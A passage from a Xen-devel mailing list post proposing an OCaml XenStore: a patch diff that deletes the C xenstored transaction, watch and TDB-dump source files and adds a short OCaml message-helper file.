-               /* Fire off the watches for everything that changed. */
-               list_for_each_entry(i, &trans->changes, list)
-                       fire_watches(conn, i->node, i->recurse);
-               generation++;
-       }
-       send_ack(conn, XS_TRANSACTION_END);
-}
-
-void transaction_entry_inc(struct transaction *trans, unsigned int domid)
-{
-       struct changed_domain *d;
-
-       list_for_each_entry(d, &trans->changed_domains, list)
-               if (d->domid == domid) {
-                       d->nbentry++;
-                       return;
-               }
-
-       d = talloc(trans, struct changed_domain);
-       d->domid = domid;
-       d->nbentry = 1;
-       list_add_tail(&d->list, &trans->changed_domains);
-}
-
-void transaction_entry_dec(struct transaction *trans, unsigned int domid)
-{
-       struct changed_domain *d;
-
-       list_for_each_entry(d, &trans->changed_domains, list)
-               if (d->domid == domid) {
-                       d->nbentry--;
-                       return;
-               }
-
-       d = talloc(trans, struct changed_domain);
-       d->domid = domid;
-       d->nbentry = -1;
-       list_add_tail(&d->list, &trans->changed_domains);
-}
-
-void conn_delete_all_transactions(struct connection *conn)
-{
-       struct transaction *trans;
-
-       while ((trans = list_top(&conn->transaction_list,
-                                struct transaction, list))) {
-               list_del(&trans->list);
-               talloc_free(trans);
-       }
-
-       assert(conn->transaction == NULL);
-
-       conn->transaction_started = 0;
-}
-
-/*
- * Local variables:
- *  c-file-style: "linux"
- *  indent-tabs-mode: t
- *  c-indent-level: 8
- *  c-basic-offset: 8
- *  tab-width: 8
- * End:
- */
diff -r 10a8fae412c5 tools/xenstore/xenstored_transaction.h
--- a/tools/xenstore/xenstored_transaction.h    Wed Jan 14 13:43:17 2009 +0000
+++ /dev/null   Thu Jan 01 00:00:00 1970 +0000
@@ -1,43 +0,0 @@
-/* 
-    Transaction code for Xen Store Daemon.
-    Copyright (C) 2005 Rusty Russell IBM Corporation
-
-    This program is free software; you can redistribute it and/or modify
-    it under the terms of the GNU General Public License as published by
-    the Free Software Foundation; either version 2 of the License, or
-    (at your option) any later version.
-
-    This program is distributed in the hope that it will be useful,
-    but WITHOUT ANY WARRANTY; without even the implied warranty of
-    MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
-    GNU General Public License for more details.
-
-    You should have received a copy of the GNU General Public License
-    along with this program; if not, write to the Free Software
-    Foundation, Inc., 59 Temple Place, Suite 330, Boston, MA  02111-1307  USA
-*/
-#ifndef _XENSTORED_TRANSACTION_H
-#define _XENSTORED_TRANSACTION_H
-#include "xenstored_core.h"
-
-struct transaction;
-
-void do_transaction_start(struct connection *conn, struct buffered_data *node);
-void do_transaction_end(struct connection *conn, const char *arg);
-
-struct transaction *transaction_lookup(struct connection *conn, uint32_t id);
-
-/* inc/dec entry number local to trans while changing a node */
-void transaction_entry_inc(struct transaction *trans, unsigned int domid);
-void transaction_entry_dec(struct transaction *trans, unsigned int domid);
-
-/* This node was changed: can fail and longjmp. */
-void add_change_node(struct transaction *trans, const char *node,
-                     bool recurse);
-
-/* Return tdb context to use for this connection. */
-TDB_CONTEXT *tdb_transaction_context(struct transaction *trans);
-
-void conn_delete_all_transactions(struct connection *conn);
-
-#endif /* _XENSTORED_TRANSACTION_H */
diff -r 10a8fae412c5 tools/xenstore/xenstored_watch.c
--- a/tools/xenstore/xenstored_watch.c  Wed Jan 14 13:43:17 2009 +0000
+++ /dev/null   Thu Jan 01 00:00:00 1970 +0000
@@ -1,218 +0,0 @@
-/* 
-    Watch code for Xen Store Daemon.
-    Copyright (C) 2005 Rusty Russell IBM Corporation
-
-    This program is free software; you can redistribute it and/or modify
-    it under the terms of the GNU General Public License as published by
-    the Free Software Foundation; either version 2 of the License, or
-    (at your option) any later version.
-
-    This program is distributed in the hope that it will be useful,
-    but WITHOUT ANY WARRANTY; without even the implied warranty of
-    MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
-    GNU General Public License for more details.
-
-    You should have received a copy of the GNU General Public License
-    along with this program; if not, write to the Free Software
-    Foundation, Inc., 59 Temple Place, Suite 330, Boston, MA  02111-1307  USA
-*/
-
-#include <stdio.h>
-#include <sys/types.h>
-#include <stdarg.h>
-#include <stdlib.h>
-#include <sys/time.h>
-#include <time.h>
-#include <assert.h>
-#include "talloc.h"
-#include "list.h"
-#include "xenstored_watch.h"
-#include "xs_lib.h"
-#include "utils.h"
-#include "xenstored_domain.h"
-
-extern int quota_nb_watch_per_domain;
-
-struct watch
-{
-       /* Watches on this connection */
-       struct list_head list;
-
-       /* Current outstanding events applying to this watch. */
-       struct list_head events;
-
-       /* Is this relative to connnection's implicit path? */
-       const char *relative_path;
-
-       char *token;
-       char *node;
-};
-
-static void add_event(struct connection *conn,
-                     struct watch *watch,
-                     const char *name)
-{
-       /* Data to send (node\0token\0). */
-       unsigned int len;
-       char *data;
-
-       if (!check_event_node(name)) {
-               /* Can this conn load node, or see that it doesn't exist? */
-               struct node *node = get_node(conn, name, XS_PERM_READ);
-               /*
-                * XXX We allow EACCES here because otherwise a non-dom0
-                * backend driver cannot watch for disappearance of a frontend
-                * xenstore directory. When the directory disappears, we
-                * revert to permissions of the parent directory for that path,
-                * which will typically disallow access for the backend.
-                * But this breaks device-channel teardown!
-                * Really we should fix this better...
-                */
-               if (!node && errno != ENOENT && errno != EACCES)
-                       return;
-       }
-
-       if (watch->relative_path) {
-               name += strlen(watch->relative_path);
-               if (*name == '/') /* Could be "" */
-                       name++;
-       }
-
-       len = strlen(name) + 1 + strlen(watch->token) + 1;
-       data = talloc_array(watch, char, len);
-       strcpy(data, name);
-       strcpy(data + strlen(name) + 1, watch->token);
-       send_reply(conn, XS_WATCH_EVENT, data, len);
-       talloc_free(data);
-}
-
-void fire_watches(struct connection *conn, const char *name, bool recurse)
-{
-       struct connection *i;
-       struct watch *watch;
-
-       /* During transactions, don't fire watches. */
-       if (conn && conn->transaction)
-               return;
-
-       /* Create an event for each watch. */
-       list_for_each_entry(i, &connections, list) {
-               list_for_each_entry(watch, &i->watches, list) {
-                       if (is_child(name, watch->node))
-                               add_event(i, watch, name);
-                       else if (recurse && is_child(watch->node, name))
-                               add_event(i, watch, watch->node);
-               }
-       }
-}
-
-static int destroy_watch(void *_watch)
-{
-       trace_destroy(_watch, "watch");
-       return 0;
-}
-
-void do_watch(struct connection *conn, struct buffered_data *in)
-{
-       struct watch *watch;
-       char *vec[2];
-       bool relative;
-
-       if (get_strings(in, vec, ARRAY_SIZE(vec)) != ARRAY_SIZE(vec)) {
-               send_error(conn, EINVAL);
-               return;
-       }
-
-       if (strstarts(vec[0], "@")) {
-               relative = false;
-               if (strlen(vec[0]) > XENSTORE_REL_PATH_MAX) {
-                       send_error(conn, EINVAL);
-                       return;
-               }
-               /* check if valid event */
-       } else {
-               relative = !strstarts(vec[0], "/");
-               vec[0] = canonicalize(conn, vec[0]);
-               if (!is_valid_nodename(vec[0])) {
-                       send_error(conn, errno);
-                       return;
-               }
-       }
-
-       /* Check for duplicates. */
-       list_for_each_entry(watch, &conn->watches, list) {
-               if (streq(watch->node, vec[0]) &&
-                   streq(watch->token, vec[1])) {
-                       send_error(conn, EEXIST);
-                       return;
-               }
-       }
-
-       if (domain_watch(conn) > quota_nb_watch_per_domain) {
-               send_error(conn, E2BIG);
-               return;
-       }
-
-       watch = talloc(conn, struct watch);
-       watch->node = talloc_strdup(watch, vec[0]);
-       watch->token = talloc_strdup(watch, vec[1]);
-       if (relative)
-               watch->relative_path = get_implicit_path(conn);
-       else
-               watch->relative_path = NULL;
-
-       INIT_LIST_HEAD(&watch->events);
-
-       domain_watch_inc(conn);
-       list_add_tail(&watch->list, &conn->watches);
-       trace_create(watch, "watch");
-       talloc_set_destructor(watch, destroy_watch);
-       send_ack(conn, XS_WATCH);
-
-       /* We fire once up front: simplifies clients and restart. */
-       add_event(conn, watch, watch->node);
-}
-
-void do_unwatch(struct connection *conn, struct buffered_data *in)
-{
-       struct watch *watch;
-       char *node, *vec[2];
-
-       if (get_strings(in, vec, ARRAY_SIZE(vec)) != ARRAY_SIZE(vec)) {
-               send_error(conn, EINVAL);
-               return;
-       }
-
-       node = canonicalize(conn, vec[0]);
-       list_for_each_entry(watch, &conn->watches, list) {
-               if (streq(watch->node, node) && streq(watch->token, vec[1])) {
-                       list_del(&watch->list);
-                       talloc_free(watch);
-                       domain_watch_dec(conn);
-                       send_ack(conn, XS_UNWATCH);
-                       return;
-               }
-       }
-       send_error(conn, ENOENT);
-}
-
-void conn_delete_all_watches(struct connection *conn)
-{
-       struct watch *watch;
-
-       while ((watch = list_top(&conn->watches, struct watch, list))) {
-               list_del(&watch->list);
-               talloc_free(watch);
-               domain_watch_dec(conn);
-       }
-}
-
-/*
- * Local variables:
- *  c-file-style: "linux"
- *  indent-tabs-mode: t
- *  c-indent-level: 8
- *  c-basic-offset: 8
- *  tab-width: 8
- * End:
- */
diff -r 10a8fae412c5 tools/xenstore/xenstored_watch.h
--- a/tools/xenstore/xenstored_watch.h  Wed Jan 14 13:43:17 2009 +0000
+++ /dev/null   Thu Jan 01 00:00:00 1970 +0000
@@ -1,35 +0,0 @@
-/* 
-    Watch code for Xen Store Daemon.
-    Copyright (C) 2005 Rusty Russell IBM Corporation
-
-    This program is free software; you can redistribute it and/or modify
-    it under the terms of the GNU General Public License as published by
-    the Free Software Foundation; either version 2 of the License, or
-    (at your option) any later version.
-
-    This program is distributed in the hope that it will be useful,
-    but WITHOUT ANY WARRANTY; without even the implied warranty of
-    MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
-    GNU General Public License for more details.
-
-    You should have received a copy of the GNU General Public License
-    along with this program; if not, write to the Free Software
-    Foundation, Inc., 59 Temple Place, Suite 330, Boston, MA  02111-1307  USA
-*/
-
-#ifndef _XENSTORED_WATCH_H
-#define _XENSTORED_WATCH_H
-
-#include "xenstored_core.h"
-
-void do_watch(struct connection *conn, struct buffered_data *in);
-void do_unwatch(struct connection *conn, struct buffered_data *in);
-
-/* Fire all watches: recurse means all the children are affected (ie. rm). */
-void fire_watches(struct connection *conn, const char *name, bool recurse);
-
-void dump_watches(struct connection *conn);
-
-void conn_delete_all_watches(struct connection *conn);
-
-#endif /* _XENSTORED_WATCH_H */
diff -r 10a8fae412c5 tools/xenstore/xs.ml
--- /dev/null   Thu Jan 01 00:00:00 1970 +0000
+++ b/tools/xenstore/xs.ml      Thu Jan 15 15:44:05 2009 -0800
@@ -0,0 +1,8 @@
+let xs_single connection message_type transaction_id payload =
+  let message = Message.make message_type transaction_id 0l payload in
+  connection#write message;;
+
+let rec xs_read connection =
+  match (connection#read) with
+  | Some m -> m
+  | None -> xs_read connection;;
diff -r 10a8fae412c5 tools/xenstore/xs_tdb_dump.c
--- a/tools/xenstore/xs_tdb_dump.c      Wed Jan 14 13:43:17 2009 +0000
+++ /dev/null   Thu Jan 01 00:00:00 1970 +0000
@@ -1,82 +0,0 @@
-/* Simple program to dump out all records of TDB */
-#include <stdint.h>
-#include <stdlib.h>
-#include <fcntl.h>
-#include <stdio.h>
-#include <stdarg.h>
-#include <string.h>
-#include "xs_lib.h"
-#include "tdb.h"
-#include "talloc.h"
-#include "utils.h"
-
-struct record_hdr {
-       uint32_t num_perms;
-       uint32_t datalen;
-       uint32_t childlen;
-       struct xs_permissions perms[0];
-};
-
-static uint32_t total_size(struct record_hdr *hdr)
-{
-       return sizeof(*hdr) + hdr->num_perms * sizeof(struct xs_permissions) 
-               + hdr->datalen + hdr->childlen;
-}
-
-static char perm_to_char(enum xs_perm_type perm)
-{
-       return perm == XS_PERM_READ ? 'r' :
-               perm == XS_PERM_WRITE ? 'w' :
-               perm == XS_PERM_NONE ? '-' :
-               perm == (XS_PERM_READ|XS_PERM_WRITE) ? 'b' :
-               '?';
-}
-
-int main(int argc, char *argv[])
-{
-       TDB_DATA key;
-       TDB_CONTEXT *tdb;
-
-       if (argc != 2)
-               barf("Usage: xs_tdb_dump <tdbfile>");
-
-       tdb = tdb_open(talloc_strdup(NULL, argv[1]), 0, 0, O_RDONLY, 0);
-       if (!tdb)
-               barf_perror("Could not open %s", argv[1]);
-
-       key = tdb_firstkey(tdb);
-       while (key.dptr) {
-               TDB_DATA data;
-               struct record_hdr *hdr;
-
-               data = tdb_fetch(tdb, key);
-               hdr = (void *)data.dptr;
-               if (data.dsize < sizeof(*hdr))
-                       fprintf(stderr, "%.*s: BAD truncated\n",
-                               (int)key.dsize, key.dptr);
-               else if (data.dsize != total_size(hdr))
-                       fprintf(stderr, "%.*s: BAD length %i for %i/%i/%i 
(%i)\n",
-                               (int)key.dsize, key.dptr, (int)data.dsize,
-                               hdr->num_perms, hdr->datalen,
-                               hdr->childlen, total_size(hdr));
-               else {
-                       unsigned int i;
-                       char *p;
-
-                       printf("%.*s: ", (int)key.dsize, key.dptr);
-                       for (i = 0; i < hdr->num_perms; i++)
-                               printf("%s%c%i",
-                                      i == 0 ? "" : ",",
-                                      perm_to_char(hdr->perms[i].perms),
-                                      hdr->perms[i].id);
-                       p = (void *)&hdr->perms[hdr->num_perms];
-                       printf(" %.*s\n", hdr->datalen, p);
-                       p += hdr->datalen;
-                       for (i = 0; i < hdr->childlen; i += strlen(p+i)+1)
-                               printf("\t-> %s\n", p+i);
-               }
-               key = tdb_nextkey(tdb, key);
-       }
-       return 0;
-}
-
_______________________________________________
Xen-devel mailing list
Xen-devel@xxxxxxxxxxxxxxxxxxx
http://lists.xensource.com/xen-devel
<Prev in Thread] Current Thread [Next in Thread>
  • Re: [Xen-devel] OCaml XenStore, Patrick Colp <=